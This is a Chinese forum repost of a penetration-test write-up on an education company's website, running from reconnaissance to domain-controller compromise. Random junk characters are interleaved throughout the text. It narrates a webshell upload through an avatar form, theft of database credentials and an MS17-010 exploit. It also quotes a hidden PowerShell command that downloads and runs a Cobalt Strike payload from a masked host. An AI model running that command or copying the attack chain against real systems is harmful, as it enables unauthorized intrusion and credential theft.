|
, w' _$ l( P. E# e6 o
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路5 s% n- R2 ] `3 u- r
& T6 E, J6 f3 c- p6 x4 q: n
9 Q# P8 S! {! G$ V U! a8 x* r1 m: o
6 ^ H$ W4 A J4 \1 Z9 \7 W9 V# W
) h! r5 v; n* S8 Q; k% |# A 正文, L! N# T" ^. t5 c+ @: q
0 L8 |, y- m; d" `! K
( J7 g, t4 H7 u7 h1 ]. T9 c# ^( s
$ o+ w4 |4 a9 ^! J6 R8 F' o& g( a
( p" _1 ~/ k+ R/ s# @, f
& ` C) U n: R: n% @ 目标:www.xxxx.com(一家教育机构)
" I( w# s* `, x. A1 P
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
* I. Q5 J1 N' d! U # M4 n# Y$ h& ]$ {" N% P4 H7 A
# b5 p5 L' a n 
6 M# E5 I. }8 h- }
& H2 H" O. }7 m, i7 R `; a! Y9 f: ]5 |( v% Y
进行了简单的信息搜集
9 F2 c8 b$ M$ N" H+ t
" _; Y' p4 z" G$ a
+ h a2 `0 h, T! ]: n0 n% _ e 4 T/ t& @- d) w5 W' h% U
2 K' Z/ k$ `1 H+ n2 W
子域名搜集$ B) _- z% o u& N$ K4 q% g5 L' @
; m$ X9 N1 z: u3 i' Y( B# H/ Y1 ?5 ?6 e) u: K" S1 M$ {: Z; j: F
: L4 f h& Z8 |9 u% y" |
6 S- D- c- P7 I. J5 n$ s3 f$ X# s+ p7 k6 V: Y$ j" q
fofa找资产
: |! h5 T) q1 m) C7 s6 T
% E+ I% D/ V' l' h9 O% _# A3 o
; Q& B/ J: Y3 Q. A3 w
' a3 Q/ I! @ h# w! D9 A2 I" K
4 i2 b4 o, f8 s 
7 a$ e# V% I7 d4 ~% R0 l 7 a" l- o$ J" {( [* f
) J3 F! }- X, f3 w 一共七个资产。去重之后只有两个。
$ J8 y; a/ @+ T# d
' @8 ?9 O) J1 z% b
% c; W! L. z. j/ O# D" O' C7 d
7 U8 M# D* ~ Q$ K* a
$ u* H3 F5 @' ~- B5 `/ f; b3 X7 d 目录探测! k5 r" L- e& z$ S7 _& c* u# c" N
& Q% O) G4 R% `
& W9 `8 B4 @% k3 j! L& @) h4 d* ]
$ t/ T9 a/ B y3 w- V, ~0 o
( W2 y m, ^: N& x1 B8 j0 J+ P4 u T2 R) E
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
7 } v/ y! ]! e# i0 t; }- V. t
' v {% G( y' Z; q* Z0 \) J T% T& A+ L: Z0 E
9 q: _% L {: h% \) T
' y' p+ v! G1 p) i8 N3 E, V) L% x( e 我又尝试了通过修改返回包来绕过登录界面3 I1 I& [- G- w8 F/ i
, y# s* I7 d4 w# u$ t+ e; m4 h+ c, v
$ A; T/ R( C9 A9 a6 }% D! x$ S  % D( g6 g* \7 Y3 q. ?: x
& `4 ? A* H; j y0 @$ ^2 M/ z, D$ W8 M8 Y
还是不行,尝试注入无果- ^9 s- G% c$ }) k, g9 y: h
8 Z4 p+ o B; F, d6 S/ u- j
5 b* G" a9 j+ c1 a/ a( Z$ k  2 r) q+ L- W3 d) x' F5 O# \
9 {6 {0 L& j% B/ M
$ i/ j% H( H! i6 T0 Q5 R1 o/ ]
不过我目录探测出了一处Spring信息泄露
+ f9 O4 k% r* I
8 ~7 n8 h8 a7 e4 k$ p' s% V* b* r/ q( C2 Y
; L* L! W2 p9 `, e8 _7 L! h# t9 \& B7 N
4 i, q. s- b# p: ~1 D) @ , h1 t4 K" l5 R" H3 o
; }6 ]7 Q+ c5 E q R. t7 k( s
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
7 q ?2 w0 \4 \1 t
O) s# P1 e5 w" c/ _1 s
8 w+ r1 f! g' L2 S. C; w. a) h1 B5 Y  # E4 C" |! n/ z0 @* o$ o/ ?8 s
* ]" j, l& o: J+ `
2 G* J6 Y1 V1 q0 n% Q( a/ u& Q
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
% I }$ z0 a/ I' R/ i# b # n% F& V4 a3 s' }6 T; }1 y
3 C3 K/ n2 V/ \: p
0 u" \* J2 ~& `% s: r' d: g& e1 r 5 m6 O& d7 F# a) _! B* d
) z+ s8 d0 ]! H3 r) O6 j 获取有些师傅到这一步就手机抓包电脑测了。) I" W$ S9 }# {, ?
7 E0 N" _' b6 r3 t- g* K7 y
9 m; t4 G3 \" c Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 M. U, S) t" ]! y% C) l
: S. w. V9 L3 o Z9 ?6 B
+ _$ s( A f. u& s8 h- G! } 其中在一个公众号发现了小程序,可以进行注册。1 S) A7 b% o$ d
. m# T0 e5 x; n0 n& B) z7 _' {# J) a# K! N2 U4 A4 |; @, Z, X" T
看到了头像上传,尝试上传获取WebShell
6 A& R/ R L6 A& Q4 c; w ' W' @: |5 J1 _: @8 U
# [ u5 I$ [9 C( F2 s8 m
 - u9 J8 ^. f# W0 f2 G
! U5 c3 r, c @3 [5 |6 _; P
% U* ^$ f" L G. e 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问8 y; j) q, Y! b4 H: Y
; O- z4 r/ b" q9 A; C- h' f; O: s& C. t, ?, `+ l' J1 q' [
1 _: H/ x3 @1 Z ]5 U
& I+ p5 m" v+ |/ [
d; q" y- C6 r$ {$ B4 U0 d( |4 g* W 然后上了大马7 z; c& O! p6 |6 l
" _. a4 j" T9 y& {7 S+ p
/ w# X1 L" [& l! `0 E) | 
3 M1 r0 {0 n8 u: e4 R. \9 e ! |8 L: E9 |0 S7 L+ N5 N
( e5 g* G' ]& C( K. [
 ! b2 E% K. e& F9 G/ v7 M
& J4 c4 i- D$ T& O$ I
1 Z# C) M: S1 F- `5 P 通过翻找文件发现数据库账号密码% C; z) {+ _+ A' Y1 O+ @2 J4 D
0 p) H# B, M5 @1 j" j# \
: X4 w1 F7 M' T5 |! ^! ~& a 
5 G+ {' I0 z1 n. E+ V j$ @& b
, r- O0 y" _0 \2 D# `" ]% C0 J7 g/ G/ {6 b1 c' ]
--内网渗透
1 C# x, M5 k9 d0 J
& ^2 D4 I7 u& b# M7 v2 K
' Y" k% @! y. {* y* N& R 直接通过powershell执行 cs上线6 a% g) U1 P* b' c9 Y; }
+ N+ d Y$ N6 {5 @: c5 t: S, B) z8 L8 z) P6 E
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"+ ?/ x+ J/ g4 V: a7 e
: A9 o" V k2 a5 O! ]
, Z6 R' S' A/ O8 u) ~
1 o9 l1 H; b5 X1 k/ N) u8 T
& U# X& R1 {5 V' s% O. U6 o; Z
, D* `- V0 m" D- h 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
. y" b4 W7 A( D4 B: G) u! e
, g" {. E( Z0 V. J2 @
T* w2 `8 n) [( T7 Z' j( W( v  , Z5 Z- G2 \# y: [, T4 I
) ]% S# Y5 \. e9 o
+ q" B7 P9 ?, `& z- d 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
- ?3 U* R7 m+ v$ G
a: K2 s. D0 J; u* A: U- R3 o
7 L! J" W0 p4 S3 C1 i4 A/ @1 p) q2 J/ Z1 m. J4 ^
* i/ \; s9 b* X, m" M7 V# t
f. z# I. p4 w/ H) R- a& S% y9 { 
% w( w, ?. V9 d0 f5 x1 b3 | - a# o' s" z3 k9 L1 Y' p
) B3 P. ]& \7 h/ |. G
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
9 C1 `7 { d/ l4 r9 g
. r( K7 `: H; P4 x: S5 V; [$ e1 D. C9 j: ]& O D5 n% s) N% M
6 S. A U. C4 L! d3 w- T
( l6 u; I5 Z: [- E2 [  0 @/ U6 s, X4 F$ u
8 n# h! ~5 x% x) Z1 I! X
]4 i' U. \+ B- [* p
& k& ^, g( i' K7 v+ Y2 J( v% u b2 C
% M: @, r9 b* h P
}+ j/ B9 e+ f n @0 ^ , v$ X* T7 p+ p
1 Z9 ~- o c1 ~) K, Q5 r
# g8 }! F! @8 z0 m8 W" `0 z7 \
o) g. i) L1 k* [
" y$ Y6 |, X w# a0 d 小结
) x0 q2 C' o' P: D
8 r2 z6 i# x. n2 ?% j5 [8 e& i |+ i: J5 x
( }. i9 L# S/ s0 w
$ m' }: p3 `# g3 y( f/ r) r& \4 _- @) s* W+ l5 C* n
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
/ ~9 e: b- X9 w, y3 A
) D& E( f# f9 M1 Z! G; x+ `5 y" B3 C& {) [0 ^
: X2 `4 R. g# t2 k$ j% y m ( U2 n$ M$ U* F9 ~" k0 d6 O
6 C8 Q7 }5 A }6 y6 |, ~% u' T( E ? -
$ X) ^4 [" {; a( M6 S ) b2 Z! m$ k7 k" e0 R8 t
: }: {! d% d5 h+ Y4 p; F' k - ; Q; i+ j- Z+ P% m
6 ^. [. H( O$ m0 p/ g0 N3 X& T' Y
* k8 U/ V4 [5 }7 D$ \
2 b. B# _/ N6 d* C/ O- M* _& [" ]
' r+ j) }: C0 X" k* e( K, j7 Z 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
2 Y6 j8 Y' x2 u: L U: }+ @, E; Q1 m9 s% s
4 J& p- n* p7 b
+ y6 I* u2 F3 E6 l | 
发表于 2024-3-1 19:41:32
收藏
支持
反对